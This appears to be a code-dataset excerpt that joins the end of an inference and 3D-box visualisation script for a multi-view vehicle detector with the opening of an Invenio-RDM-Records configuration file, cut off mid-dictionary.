tmp = np.zeros(shape=left_pred_conf.shape)
tmp += angle_bins
left_angle_bins = tmp
tmp = np.zeros(shape=right_pred_conf.shape)
tmp += angle_bins
right_angle_bins = tmp
left_argmax = np.argmax(left_pred_conf.detach().cpu().numpy(), axis=1)
left_orient = left_pred_orientation[np.arange(len(left_pred_orientation)), left_argmax]
left_cos = left_orient[:, 0]
left_sin = left_orient[:, 1]
left_alpha = np.arctan2(left_sin.cpu().detach().numpy(), left_cos.cpu().detach().numpy())
left_alpha += left_angle_bins[np.arange(len(left_argmax)), left_argmax] # 0~180, (R, 2), residual angle
right_argmax = np.argmax(right_pred_conf.detach().cpu().numpy(), axis=1)
right_orient = right_pred_orientation[np.arange(len(right_pred_orientation)), right_argmax]
right_cos = right_orient[:, 0]
right_sin = right_orient[:, 1]
right_alpha = np.arctan2(right_sin.cpu().detach().numpy(), right_cos.cpu().detach().numpy())
right_alpha += right_angle_bins[np.arange(len(right_argmax)), right_argmax] # 0~180, (R, 2), residual angle
left_prob = at.tonumpy(F.softmax(at.totensor(left_roi_score), dim=1))
left_front_prob = left_prob[:, 1]
right_prob = at.tonumpy(F.softmax(at.totensor(right_roi_score), dim=1))
right_front_prob = right_prob[:, 1]
position_mark = np.concatenate(
(np.zeros((left_front_prob.shape[0],)), np.ones((right_front_prob.shape[0]))))
all_front_prob = np.concatenate((left_front_prob, right_front_prob))
all_roi_remain = np.concatenate((roi[left_index_inside], roi[right_index_inside]))
all_pred_alpha = np.concatenate((at.tonumpy(left_alpha), at.tonumpy(right_alpha)))
v, indices = torch.tensor(all_front_prob).sort(0)
indices_remain = indices[v > 0.6]
print("Frame Number: ", frame.item())
all_roi_remain = all_roi_remain[indices_remain].reshape(len(indices_remain), 4)
all_pred_alpha = all_pred_alpha[indices_remain].reshape(len(indices_remain), 1)
all_front_prob = all_front_prob[indices_remain].reshape(len(indices_remain), )
position_mark = position_mark[indices_remain].reshape(len(indices_remain), 1)
all_bev_boxes = []
if indices_remain.shape[0] != 0:
if indices_remain.shape[0] == 1:
keep = [0]
else:
keep = box_ops.nms(torch.tensor(all_roi_remain), torch.tensor(all_front_prob), 0)
all_bev_boxes, all_pred_alpha, position_mark_keep = all_roi_remain[keep].reshape(len(keep), 4), \
all_pred_alpha[keep].reshape(len(keep), 1), \
position_mark[keep].reshape(len(keep))
if len(all_bev_boxes) != 0:
test_gt_res, test_pred_res = visualize_3dbox(all_bev_boxes, all_pred_alpha, position_mark_keep, gt_bbox,
bev_angle, all_front_prob[keep], extrin, intrin, frame)
for p in range(len(test_gt_res)):
all_gt_res.append(test_gt_res[p])
for l in range(len(test_pred_res)):
all_pred_res.append(test_pred_res[l])
res_fpath = '%s/res/all_res.txt' % Const.data_root
all_gt_fpath = '%s/res/all_test_gt.txt' % Const.data_root
all_gt_res = np.array(all_gt_res).reshape(-1, 14)
all_pred_res = np.array(all_pred_res).reshape(-1, 15)
np.savetxt(res_fpath, all_pred_res, "%f")
np.savetxt(all_gt_fpath, all_gt_res, "%f")
recall, precision, moda, modp = evaluate(os.path.abspath(res_fpath), os.path.abspath(all_gt_fpath),
data_loader.dataset.base.__name__)
AP_50, AOS_50, OS_50, AP_25, AOS_25, OS_25 = evaluateDetectionAPAOS(res_fpath, all_gt_fpath)
print()
print("MODA: %.1f" % moda, ", MODP: %.1f" % modp, ", Prec .: %.1f" % precision, ", Recall: %.1f" % recall )
print("AP_50: %.1f" % AP_50, " ,AOS_50: %.1f" % AOS_50, ", OS_50: %.2f" % OS_50)
print("AP_25: %.1f" % AP_25, " ,AOS_25: %.1f" % AOS_25, ", OS_25: %.2f" % OS_25)
@property
def n_class(self):
return self.roi_head.n_class
def generate_bins(bins):
angle_bins = np.zeros(bins)
interval = 2 * np.pi / bins
for i in range(1, bins):
angle_bins[i] = i * interval
angle_bins += interval / 2 # center of the bin
return angle_bins
def visualize_3dbox(pred_ori, pred_alpha, position_mark, gt_bbox, bev_angle, all_front_prob, extrin, intrin, idx, isRoi=False):
# left_img = cv2.imread("/home/dzc/Data/%s/img/left1/%d.jpg" % (Const.dataset, idx))
right_img = cv2.imread("%s/img/right2/%d.jpg" % (Const.data_root, idx))
all_pred_res = []
all_gt_res = []
n_bbox = pred_ori.shape[0]
gt_bbox = gt_bbox[0]
bev_angle = bev_angle[0]
gt_n_bbox = gt_bbox.shape[0]
# ======================Gt========================
boxes_3d = []
for j, bbox in enumerate(gt_bbox):
ymin, xmin, ymax, xmax = bbox
theta = bev_angle[j]
center_x, center_y = int((xmin + xmax) // 2), int((ymin + ymax) // 2)
w = Const.car_length
h = Const.car_width
xmin = center_x - w // 2
xmax = center_x + w // 2
ymin = center_y - h // 2
ymax = center_y + h // 2
x1_ori, x2_ori, x3_ori, x4_ori, x_mid = xmin, xmin, xmax, xmax, (xmin + xmax) / 2 - 40
y1_ori, y2_ori, y3_ori, y4_ori, y_mid = Const.grid_height - ymin, Const.grid_height - ymax, Const.grid_height - ymax, Const.grid_height - ymin, (
Const.grid_height - ymax + Const.grid_height - ymin) / 2
x1_rot, x2_rot, x3_rot, x4_rot, xmid_rot = \
int(math.cos(theta) * (x1_ori - center_x) - math.sin(theta) * (
y1_ori - (Const.grid_height - center_y)) + center_x), \
int(math.cos(theta) * (x2_ori - center_x) - math.sin(theta) * (
y2_ori - (Const.grid_height - center_y)) + center_x), \
int(math.cos(theta) * (x3_ori - center_x) - math.sin(theta) * (
y3_ori - (Const.grid_height - center_y)) + center_x), \
int(math.cos(theta) * (x4_ori - center_x) - math.sin(theta) * (
y4_ori - (Const.grid_height - center_y)) + center_x), \
int(math.cos(theta) * (x_mid - center_x) - math.sin(theta) * (
y_mid - (Const.grid_height - center_y)) + center_x)
y1_rot, y2_rot, y3_rot, y4_rot, ymid_rot = \
int(math.sin(theta) * (x1_ori - center_x) + math.cos(theta) * (y1_ori - (Const.grid_height - center_y)) + (
Const.grid_height - center_y)), \
int(math.sin(theta) * (x2_ori - center_x) + math.cos(theta) * (y2_ori - (Const.grid_height - center_y)) + (
Const.grid_height - center_y)), \
int(math.sin(theta) * (x3_ori - center_x) + math.cos(theta) * (y3_ori - (Const.grid_height - center_y)) + (
Const.grid_height - center_y)), \
int(math.sin(theta) * (x4_ori - center_x) + math.cos(theta) * (y4_ori - (Const.grid_height - center_y)) + (
Const.grid_height - center_y)), \
int(math.sin(theta) * (x_mid - center_x) + math.cos(theta) * (y_mid - (Const.grid_height - center_y)) + (
Const.grid_height - center_y))
all_gt_res.append(
[idx.item(), center_x, center_y, w, h, np.rad2deg(theta.item()), x1_rot, y1_rot, x2_rot, y2_rot, x3_rot,
y3_rot, x4_rot, y4_rot])
pt0 = [x1_rot, y1_rot, 0]
pt1 = [x2_rot, y2_rot, 0]
pt2 = [x3_rot, y3_rot, 0]
pt3 = [x4_rot, y4_rot, 0]
pt_h_0 = [x1_rot, y1_rot, Const.car_height]
pt_h_1 = [x2_rot, y2_rot, Const.car_height]
pt_h_2 = [x3_rot, y3_rot, Const.car_height]
pt_h_3 = [x4_rot, y4_rot, Const.car_height]
pt_extra = [xmid_rot, ymid_rot, 0]
boxes_3d.append([pt0, pt1, pt2, pt3, pt_h_0, pt_h_1, pt_h_2, pt_h_3, pt_extra])
gt_ori = np.array(boxes_3d).reshape((gt_n_bbox, 9, 3))
# gt_projected_2d = getprojected_3dbox(gt_ori, extrin, intrin, isleft=True)
gt_projected_2d = getprojected_3dbox(gt_ori, extrin, intrin, isleft=False)
for k in range(gt_n_bbox):
color = (0, 60, 199)
cv2.line(right_img, (gt_projected_2d[k][0][0], gt_projected_2d[k][0][1]),
(gt_projected_2d[k][1][0], gt_projected_2d[k][1][1]), color=color, thickness=2)
cv2.line(right_img, (gt_projected_2d[k][0][0], gt_projected_2d[k][0][1]),
(gt_projected_2d[k][3][0], gt_projected_2d[k][3][1]), color=color, thickness=2)
cv2.line(right_img, (gt_projected_2d[k][0][0], gt_projected_2d[k][0][1]),
(gt_projected_2d[k][4][0], gt_projected_2d[k][4][1]), color=color, thickness=2)
cv2.line(right_img, (gt_projected_2d[k][1][0], gt_projected_2d[k][1][1]),
(gt_projected_2d[k][5][0], gt_projected_2d[k][5][1]), color=color, thickness=2)
cv2.line(right_img, (gt_projected_2d[k][1][0], gt_projected_2d[k][1][1]),
(gt_projected_2d[k][2][0], gt_projected_2d[k][2][1]), color=color, thickness=2)
cv2.line(right_img, (gt_projected_2d[k][2][0], gt_projected_2d[k][2][1]),
(gt_projected_2d[k][3][0], gt_projected_2d[k][3][1]), color=color, thickness=2)
cv2.line(right_img, (gt_projected_2d[k][2][0], gt_projected_2d[k][2][1]),
(gt_projected_2d[k][6][0], gt_projected_2d[k][6][1]), color=color, thickness=2)
cv2.line(right_img, (gt_projected_2d[k][3][0], gt_projected_2d[k][3][1]),
(gt_projected_2d[k][7][0], gt_projected_2d[k][7][1]), color=color, thickness=2)
cv2.line(right_img, (gt_projected_2d[k][4][0], gt_projected_2d[k][4][1]),
(gt_projected_2d[k][5][0], gt_projected_2d[k][5][1]), color=color, thickness=2)
cv2.line(right_img, (gt_projected_2d[k][5][0], gt_projected_2d[k][5][1]),
(gt_projected_2d[k][6][0], gt_projected_2d[k][6][1]), color=color, thickness=2)
cv2.line(right_img, (gt_projected_2d[k][6][0], gt_projected_2d[k][6][1]),
(gt_projected_2d[k][7][0], gt_projected_2d[k][7][1]), color=color, thickness=2)
cv2.line(right_img, (gt_projected_2d[k][7][0], gt_projected_2d[k][7][1]),
(gt_projected_2d[k][4][0], gt_projected_2d[k][4][1]), color=color, thickness=2)
cv2.line(right_img, (gt_projected_2d[k][7][0], gt_projected_2d[k][7][1]),
(gt_projected_2d[k][4][0], gt_projected_2d[k][4][1]), color=color, thickness=2)
cv2.arrowedLine(right_img, (int((gt_projected_2d[k][0][0] + gt_projected_2d[k][2][0]) / 2),
int((gt_projected_2d[k][0][1] + gt_projected_2d[k][2][1]) / 2)),
(gt_projected_2d[k][8][0], gt_projected_2d[k][8][1]), color=(255, 60, 199), thickness=2)
cv2.imwrite("result_images/%d_gt.jpg" % (idx), right_img)
right_img = cv2.imread("%s/img/right2/%d.jpg" % (Const.data_root, idx))
boxes_3d = []
for i, bbox in enumerate(pred_ori):
ymin, xmin, ymax, xmax = bbox
alpha = pred_alpha[i]
if pred_alpha.shape[0] == 1:
score = 1.0
else:
score = all_front_prob[i]
if position_mark[i] == 0:
center_x, center_y = int((bbox[1] + bbox[3]) // 2), int((bbox[0] + bbox[2]) // 2)
w, h = Const.car_length, Const.car_width
xmin = center_x - w//2
xmax = center_x + w//2
ymin = center_y - h//2
ymax = center_y + h//2
x1_ori, x2_ori, x3_ori, x4_ori, x_mid = xmin, xmin, xmax, xmax, (xmin + xmax) / 2 + 40
y1_ori, y2_ori, y3_ori, y4_ori, y_mid = Const.grid_height - ymin, Const.grid_height - ymax, Const.grid_height - ymax, Const.grid_height - ymin, (
Const.grid_height - ymax + Const.grid_height - ymin) / 2
center_x, center_y = int((bbox[1] + bbox[3]) // 2), int((bbox[0] + bbox[2]) // 2)
ray = np.arctan((Const.grid_height - center_y) / center_x)
angle = alpha
else:
center_x, center_y = int((xmin + xmax) // 2), int((ymin + ymax) // 2)
w, h = Const.car_length, Const.car_width
xmin = center_x - w // 2
xmax = center_x + w // 2
ymin = center_y - h // 2
ymax = center_y + h // 2
x1_ori, x2_ori, x3_ori, x4_ori, x_mid = xmin, xmin, xmax, xmax, (xmin + xmax) / 2 - 40
y1_ori, y2_ori, y3_ori, y4_ori, y_mid = Const.grid_height - ymin, Const.grid_height - ymax, Const.grid_height - ymax, Const.grid_height - ymin, (
Const.grid_height - ymax + Const.grid_height - ymin) / 2
center_x, center_y = int((xmin + xmax) // 2), int((ymin + ymax) // 2)
ray = np.arctan(center_y / (Const.grid_width - center_x))
angle = alpha
theta_l = angle
theta = theta_l + ray
x1_rot, x2_rot, x3_rot, x4_rot, xmid_rot = \
int(math.cos(theta) * (x1_ori - center_x) - math.sin(theta) * (
y1_ori - (Const.grid_height - center_y)) + center_x), \
int(math.cos(theta) * (x2_ori - center_x) - math.sin(theta) * (
y2_ori - (Const.grid_height - center_y)) + center_x), \
int(math.cos(theta) * (x3_ori - center_x) - math.sin(theta) * (
y3_ori - (Const.grid_height - center_y)) + center_x), \
int(math.cos(theta) * (x4_ori - center_x) - math.sin(theta) * (
y4_ori - (Const.grid_height - center_y)) + center_x), \
int(math.cos(theta) * (x_mid - center_x) - math.sin(theta) * (
y_mid - (Const.grid_height - center_y)) + center_x)
y1_rot, y2_rot, y3_rot, y4_rot, ymid_rot = \
int(math.sin(theta) * (x1_ori - center_x) + math.cos(theta) * (y1_ori - (Const.grid_height - center_y)) + (
Const.grid_height - center_y)), \
int(math.sin(theta) * (x2_ori - center_x) + math.cos(theta) * (y2_ori - (Const.grid_height - center_y)) + (
Const.grid_height - center_y)), \
int(math.sin(theta) * (x3_ori - center_x) + math.cos(theta) * (y3_ori - (Const.grid_height - center_y)) + (
Const.grid_height - center_y)), \
int(math.sin(theta) * (x4_ori - center_x) + math.cos(theta) * (y4_ori - (Const.grid_height - center_y)) + (
Const.grid_height - center_y)), \
int(math.sin(theta) * (x_mid - center_x) + math.cos(theta) * (y_mid - (Const.grid_height - center_y)) + (
Const.grid_height - center_y))
if position_mark[i] == 0:
theta_left = theta + np.pi
all_pred_res.append(
[idx.item(), center_x, center_y, w, h, np.rad2deg(theta_left.item()), score, x1_rot, y1_rot, x2_rot,
y2_rot, x3_rot, y3_rot, x4_rot, y4_rot])
else:
all_pred_res.append(
[idx.item(), center_x, center_y, w, h, np.rad2deg(theta.item()), score, x1_rot, y1_rot, x2_rot, y2_rot,
x3_rot, y3_rot, x4_rot, y4_rot])
pt0 = [x1_rot, y1_rot, 0]
pt1 = [x2_rot, y2_rot, 0]
pt2 = [x3_rot, y3_rot, 0]
pt3 = [x4_rot, y4_rot, 0]
pt_h_0 = [x1_rot, y1_rot, Const.car_height]
pt_h_1 = [x2_rot, y2_rot, Const.car_height]
pt_h_2 = [x3_rot, y3_rot, Const.car_height]
pt_h_3 = [x4_rot, y4_rot, Const.car_height]
pt_extra = [xmid_rot, ymid_rot, 0]
boxes_3d.append([pt0, pt1, pt2, pt3, pt_h_0, pt_h_1, pt_h_2, pt_h_3, pt_extra])
pred_ori = np.array(boxes_3d).reshape((n_bbox, 9, 3))
# projected_2d_left = getprojected_3dbox(pred_ori, extrin, intrin, isleft=True)
projected_2d = getprojected_3dbox(pred_ori, extrin, intrin, isleft=False)
for k in range(n_bbox):
if position_mark[k] == 0:
color = (255, 255, 0)
color = (0, 255, 0)
else:
color = (100, 100, 200)
color = (0, 255, 0)
if position_mark[k] == 1 and isRoi:
cv2.line(right_img, (projected_2d[k][0][0], projected_2d[k][0][1]),
(projected_2d[k][1][0], projected_2d[k][1][1]), color=color, thickness=2)
cv2.line(right_img, (projected_2d[k][0][0], projected_2d[k][0][1]),
(projected_2d[k][3][0], projected_2d[k][3][1]), color=color, thickness=2)
cv2.line(right_img, (projected_2d[k][0][0], projected_2d[k][0][1]),
(projected_2d[k][4][0], projected_2d[k][4][1]), color=color, thickness=2)
cv2.line(right_img, (projected_2d[k][1][0], projected_2d[k][1][1]),
(projected_2d[k][5][0], projected_2d[k][5][1]), color=color, thickness=2)
cv2.line(right_img, (projected_2d[k][1][0], projected_2d[k][1][1]),
(projected_2d[k][2][0], projected_2d[k][2][1]), color=color, thickness=2)
cv2.line(right_img, (projected_2d[k][2][0], projected_2d[k][2][1]),
(projected_2d[k][3][0], projected_2d[k][3][1]), color=color, thickness=2)
cv2.line(right_img, (projected_2d[k][2][0], projected_2d[k][2][1]),
(projected_2d[k][6][0], projected_2d[k][6][1]), color=color, thickness=2)
cv2.line(right_img, (projected_2d[k][3][0], projected_2d[k][3][1]),
(projected_2d[k][7][0], projected_2d[k][7][1]), color=color, thickness=2)
cv2.line(right_img, (projected_2d[k][4][0], projected_2d[k][4][1]),
(projected_2d[k][5][0], projected_2d[k][5][1]), color=color, thickness=2)
cv2.line(right_img, (projected_2d[k][5][0], projected_2d[k][5][1]),
(projected_2d[k][6][0], projected_2d[k][6][1]), color=color, thickness=2)
cv2.line(right_img, (projected_2d[k][6][0], projected_2d[k][6][1]),
(projected_2d[k][7][0], projected_2d[k][7][1]), color=color, thickness=2)
cv2.line(right_img, (projected_2d[k][7][0], projected_2d[k][7][1]),
(projected_2d[k][4][0], projected_2d[k][4][1]), color=color, thickness=2)
cv2.line(right_img, (projected_2d[k][7][0], projected_2d[k][7][1]),
(projected_2d[k][4][0], projected_2d[k][4][1]), color=color, thickness=2)
else:
cv2.arrowedLine(right_img, (int((projected_2d[k][0][0] + projected_2d[k][2][0]) / 2),
int((projected_2d[k][0][1] + projected_2d[k][2][1]) / 2)),
(projected_2d[k][8][0], projected_2d[k][8][1]), color=(255, 60, 199), thickness=2)
cv2.line(right_img, (projected_2d[k][0][0], projected_2d[k][0][1]),
(projected_2d[k][1][0], projected_2d[k][1][1]), color=color, thickness=2)
cv2.line(right_img, (projected_2d[k][0][0], projected_2d[k][0][1]),
(projected_2d[k][3][0], projected_2d[k][3][1]), color=color, thickness=2)
cv2.line(right_img, (projected_2d[k][0][0], projected_2d[k][0][1]),
(projected_2d[k][4][0], projected_2d[k][4][1]), color=color, thickness=2)
cv2.line(right_img, (projected_2d[k][1][0], projected_2d[k][1][1]),
(projected_2d[k][5][0], projected_2d[k][5][1]), color=color, thickness=2)
cv2.line(right_img, (projected_2d[k][1][0], projected_2d[k][1][1]),
(projected_2d[k][2][0], projected_2d[k][2][1]), color=color, thickness=2)
cv2.line(right_img, (projected_2d[k][2][0], projected_2d[k][2][1]),
(projected_2d[k][3][0], projected_2d[k][3][1]), color=color, thickness=2)
cv2.line(right_img, (projected_2d[k][2][0], projected_2d[k][2][1]),
(projected_2d[k][6][0], projected_2d[k][6][1]), color=color, thickness=2)
cv2.line(right_img, (projected_2d[k][3][0], projected_2d[k][3][1]),
(projected_2d[k][7][0], projected_2d[k][7][1]), color=color, thickness=2)
cv2.line(right_img, (projected_2d[k][4][0], projected_2d[k][4][1]),
(projected_2d[k][5][0], projected_2d[k][5][1]), color=color, thickness=2)
cv2.line(right_img, (projected_2d[k][5][0], projected_2d[k][5][1]),
(projected_2d[k][6][0], projected_2d[k][6][1]), color=color, thickness=2)
cv2.line(right_img, (projected_2d[k][6][0], projected_2d[k][6][1]),
(projected_2d[k][7][0], projected_2d[k][7][1]), color=color, thickness=2)
cv2.line(right_img, (projected_2d[k][7][0], projected_2d[k][7][1]),
(projected_2d[k][4][0], projected_2d[k][4][1]), color=color, thickness=2)
cv2.line(right_img, (projected_2d[k][7][0], projected_2d[k][7][1]),
(projected_2d[k][4][0], projected_2d[k][4][1]), color=color, thickness=2)
cv2.arrowedLine(right_img, (int((projected_2d[k][0][0] + projected_2d[k][2][0]) / 2),
int((projected_2d[k][0][1] + projected_2d[k][2][1]) / 2)),
(projected_2d[k][8][0], projected_2d[k][8][1]), color=(255, 60, 199), thickness=2)
if isRoi:
cv2.imwrite("/home/dzc/Desktop/CASIA/proj/mvRPN-det/results/images/3d_box_blend/%d_roi.jpg" % idx, right_img)
else:
cv2.imwrite("result_images/%d.jpg" % (idx), right_img)
return all_gt_res, all_pred_res
def _smooth_l1_loss(x, t, in_weight, sigma):
sigma2 = sigma ** 2
diff = in_weight * (x - t)
abs_diff = diff.abs()
flag = (abs_diff.data < (1. / sigma2)).float()
y = (flag * (sigma2 / 2.) * (diff ** 2) +
(1 - flag) * (abs_diff - 0.5 / sigma2))
return y.sum()
def _fast_rcnn_loc_loss(pred_loc, gt_loc, gt_label, sigma):
in_weight = torch.zeros(gt_loc.shape).to(pred_loc.device)
gt_loc = torch.tensor(gt_loc).to(pred_loc.device)
gt_label = torch.tensor(gt_label).to(pred_loc.device)
# print(in_weight.shape, gt_loc.shape, gt_label.shape)
# Localization loss is calculated only for positive rois.
# NOTE: unlike origin implementation,
# we don't need inside_weight and outside_weight, they can calculate by gt_label
in_weight[(torch.tensor(gt_label) > 0).view(-1, 1).expand_as(in_weight).cuda()] = 1
loc_loss = _smooth_l1_loss(pred_loc, gt_loc, in_weight.detach(), sigma)
# Normalize by total number of negtive and positive rois.
loc_loss /= ((gt_label >= 0).sum().float()) # ignore gt_label==-1 for rpn_loss
return loc_loss
def generate_3d_bbox(pred_bboxs):
# 输出以左下角为原点的3d坐标
n_bbox = pred_bboxs.shape[0]
zeros = np.zeros((n_bbox, 1))
heights = np.zeros((n_bbox, 1)) * Const.car_height
ymax, xmax, ymin, xmin = pred_bboxs[:, 0].reshape(-1, 1), pred_bboxs[:, 1].reshape(-1, 1), pred_bboxs[:, 2].reshape(
-1, 1), pred_bboxs[:, 3].reshape(-1, 1)
pt0s = np.concatenate((xmax, Const.grid_height - ymin, zeros), axis=1).reshape(1, n_bbox, 3)
pt1s = np.concatenate((xmin, Const.grid_height - ymin, zeros), axis=1).reshape(1, n_bbox, 3)
pt2s = np.concatenate((xmin, Const.grid_height - ymax, zeros), axis=1).reshape(1, n_bbox, 3)
pt3s = np.concatenate((xmax, Const.grid_height - ymax, zeros), axis=1).reshape(1, n_bbox, 3)
pth0s = np.concatenate((xmax, Const.grid_height - ymin, heights), axis=1).reshape(1, n_bbox, 3)
pth1s = np.concatenate((xmin, Const.grid_height - ymin, heights), axis=1).reshape(1, n_bbox, 3)
pth2s = np.concatenate((xmin, Const.grid_height - ymax, heights), axis=1).reshape(1, n_bbox, 3)
pth3s = np.concatenate((xmax, Const.grid_height - ymax, heights), axis=1).reshape(1, n_bbox, 3)
res = np.vstack((pt0s, pt1s, pt2s, pt3s, pth0s, pth1s, pth2s, pth3s)).transpose(1, 0, 2)
return res
def getimage_pt(points3d, extrin, intrin):
# 此处输入的是以左下角为原点的坐标,输出的是opencv格式的左上角为原点的坐标
newpoints3d = np.vstack((points3d, 1.0))
Zc = np.dot(extrin, newpoints3d)[-1]
imagepoints = (np.dot(intrin, np.dot(extrin, newpoints3d)) / Zc).astype(np.int)
return [imagepoints[0, 0], imagepoints[1, 0]]
def getprojected_3dbox(points3ds, extrin, intrin, isleft=True):
if isleft:
extrin_ = extrin[0].numpy()
intrin_ = intrin[0].numpy()
else:
extrin_ = extrin[1].numpy()
intrin_ = intrin[1].numpy()
extrin_big = extrin_.repeat(points3ds.shape[0] * points3ds.shape[1], axis=0)
intrin_big = intrin_.repeat(points3ds.shape[0] * points3ds.shape[1], axis=0)
points3ds_big = points3ds.reshape(points3ds.shape[0], points3ds.shape[1], 3, 1)
homog = np.ones((points3ds.shape[0], points3ds.shape[1], 1, 1))
homo3dpts = np.concatenate((points3ds_big, homog), 2).reshape(points3ds.shape[0] * points3ds.shape[1], 4, 1)
res = np.matmul(extrin_big, homo3dpts)
Zc = res[:, -1]
res2 = np.matmul(intrin_big, res)
imagepoints = (res2.reshape(-1, 3) / Zc).reshape((points3ds.shape[0], points3ds.shape[1], 3))[:, :, :2].astype(int)
return imagepoints
def get_outter(projected_3dboxes):
projected_3dboxes = projected_3dboxes + 1e-3
zero_mask = np.zeros((projected_3dboxes.shape[0], projected_3dboxes.shape[1], 1))
one_mask = np.ones((projected_3dboxes.shape[0], projected_3dboxes.shape[1], 1))
huge_mask = one_mask * 1000
ymax_mask = np.concatenate((zero_mask, one_mask), axis=2)
xmax_mask = np.concatenate((one_mask, zero_mask), axis=2)
ymin_mask = np.concatenate((huge_mask, one_mask), axis=2)
xmin_mask = np.concatenate((one_mask, huge_mask), axis=2)
xmax = np.max((projected_3dboxes * xmax_mask), axis=(1, 2)).reshape(1, -1, 1)
ymax = np.max((projected_3dboxes * ymax_mask), axis=(1, 2)).reshape(1, -1, 1)
xmin = np.min((projected_3dboxes * xmin_mask), axis=(1, 2)).reshape(1, -1, 1)
ymin = np.min((projected_3dboxes * ymin_mask), axis=(1, 2)).reshape(1, -1, 1)
res = np.concatenate((ymin, xmin, ymax, xmax), axis=2)
res = np.array(res, dtype=int).squeeze()
return res
def main(args):
if args.seed is not None:
np.random.seed(args.seed)
torch.manual_seed(7)
torch.backends.cudnn.benchmark = True
else:
torch.backends.cudnn.benchmark = True
# dataset
normalize = T.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225))
denormalize = img_color_denormalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225))
test_trans = T.Compose([T.ToTensor(), normalize])
data_path = os.path.expanduser(Const.data_root)
base = MVM3D(data_path, args, worldgrid_shape=Const.grid_size)
test_set = MVM3D_loader(base, train=2, transform=test_trans, grid_reduce=Const.reduce)
test_loader = torch.utils.data.DataLoader(test_set, batch_size=1, shuffle=False,
num_workers=8, pin_memory=True, drop_last=True)
# model
model = PerspTransDetector(test_set)
mbon_head = MbonHead(Const.roi_classes + 1, 7, 1 / Const.reduce)
trainer = Inferer(model, mbon_head, denormalize)
model.load_state_dict(torch.load('pretrained_models/ppn.pth'))
mbon_head.load_state_dict(torch.load('pretrained_models/mbon.pth'))
mbon_head.eval()
model.eval()
trainer.infer(test_loader)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='MVM3D')
parser.add_argument('-d', '--dataset', type=str, default='robo', choices=['wildtrack' ,'robo'])
parser.add_argument('-j', '--num_workers', type=int, default=8)
parser.add_argument('-b', '--batch_size', type=int, default=1, metavar='N',
help='input batch size for training (default: 1)')
parser.add_argument('--seed', type=int, default=7, help='random seed (default: None)')
parser.add_argument('--resume', type=bool, default = True)
args = parser.parse_args()
main(args)
|
StarcoderdataPython
|
38111
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2019 CERN.
# Copyright (C) 2019 Northwestern University.
#
# Invenio-RDM-Records is free software; you can redistribute it and/or modify
# it under the terms of the MIT License; see LICENSE file for more details.
"""DataCite-based data model for Invenio."""
from .utils import previewer_record_file_factory
def _(x):
"""Identity function for string extraction."""
return x
# Records REST API endpoints.
# NOTE: We have to keep this until invenio-records-files and
# invenio-communities use the new records-resources way of creating APIs
RECORDS_REST_ENDPOINTS = {}
"""REST API for invenio_rdm_records."""
# Files REST
# FILES_REST_PERMISSION_FACTORY = record_files_permission_factory
"""Set default files permission factory."""
# Invenio-IIIF
# =================
# See https://invenio-iiif.readthedocs.io/en/latest/configuration.html
IIIF_PREVIEW_TEMPLATE = "invenio_rdm_records/iiif_preview.html"
"""Template for IIIF image preview."""
# Invenio-Previewer
# =================
# See https://github.com/inveniosoftware/invenio-previewer/blob/master/invenio_previewer/config.py # noqa
PREVIEWER_PREFERENCE = [
'csv_dthreejs',
# TODO: IIIF checks bucket-level permissions, and thus won't work
# 'iiif_image',
'simple_image',
'json_prismjs',
'xml_prismjs',
'mistune',
'pdfjs',
'ipynb',
'zip',
]
"""Preferred previewers."""
# Invenio-Records-UI
# ==================
# See https://invenio-records-ui.readthedocs.io/en/latest/configuration.html
RECORDS_UI_ENDPOINTS = {
'recid': {
'pid_type': 'recid',
'record_class': 'invenio_rdm_records.records:BibliographicRecord',
'route': '/records/<pid_value>',
'template': 'invenio_rdm_records/record_landing_page.html'
},
'recid_files': {
'pid_type': 'recid',
'record_class': 'invenio_rdm_records.records:BibliographicRecord',
'route': '/records/<pid_value>/files/<path:filename>',
'view_imp': 'invenio_rdm_records.theme.views.file_download_ui',
},
'recid_previewer': {
'pid_type': 'recid',
'record_class': 'invenio_rdm_records.records:BibliographicRecord',
'route': '/records/<pid_value>/preview/<path:filename>',
'view_imp': 'invenio_previewer.views.preview',
},
}
"""Records UI for RDM Records."""
# Invenio-Formatter
# =================
FORMATTER_BADGES_ALLOWED_TITLES = ['DOI', 'doi']
"""List of allowed titles in badges."""
FORMATTER_BADGES_TITLE_MAPPING = {'doi': 'DOI'}
"""Mapping of titles."""
# Invenio-RDM-Records
# ===================
RDM_RECORDS_LOCAL_DOI_PREFIXES = ['10.9999']
"""List of locally managed DOI prefixes."""
RDM_RECORDS_METADATA_NAMESPACES = {}
"""Namespaces for fields *added* to the metadata schema.
Of the shape:
.. code-block:: python
{
'<prefix1>': {
'@context': '<url>'
},
# ...
'<prefixN>': {
'@context': '<url>'
}
}
For example:
.. code-block:: python
{
'dwc': {
'@context': 'http://rs.tdwg.org/dwc/terms/'
},
'z':{
'@context': 'https://zenodo.org/terms'
}
}
Use :const:`invenio_rdm_records.config.RDM_RECORDS_METADATA_EXTENSIONS` to
define the added fields.
See :class:`invenio_rdm_records.services.schemas.\
metadata_extensions.MetadataExtensions` for
how this configuration variable is used.
"""
RDM_RECORDS_METADATA_EXTENSIONS = {}
"""Fields added to the metadata schema.
Of the shape:
.. code-block:: python
{
'<prefix1>:<field1>': {
'elasticsearch': '<allowed elasticsearch type>'
'marshmallow': '<allowed marshmallow type>'
},
# ...
'<prefixN>:<fieldN>': {
'elasticsearch': '<allowed elasticsearch type>'
'marshmallow': '<allowed marshmallow type>'
}
}
For example:
.. code-block:: python
{
'dwc:family': {
'elasticsearch': 'keyword',
'marshmallow': SanitizedUnicode()
},
'dwc:behavior': {
'elasticsearch': 'text',
'marshmallow': SanitizedUnicode()
},
'z:department': {
'elasticsearch': 'text',
'marshmallow': SanitizedUnicode()
}
}
Use :const:`invenio_rdm_records.config.RDM_RECORDS_METADATA_NAMESPACES` to
define the prefixes.
See :class:`invenio_rdm_records.services.schemas.\
metadata_extensions.MetadataExtensions` for
allowed types and how this configuration variable is used.
"""
RDM_RECORDS_CUSTOM_VOCABULARIES = {}
"""Paths to custom controlled vocabularies.
Of the shape:
.. code-block:: python
{
'<dotted>.<path>.<to field1>': {
'path': '<absolute path to CSV file containing it>'
},
# ...
'<dotted>.<path>.<to fieldN>': {
'path': '<absolute path to CSV file containing it>'
}
}
For example:
.. code-block:: python
{
'resource_type': {
'path': os.path.join(
os.path.dirname(os.path.abspath(__file__)),
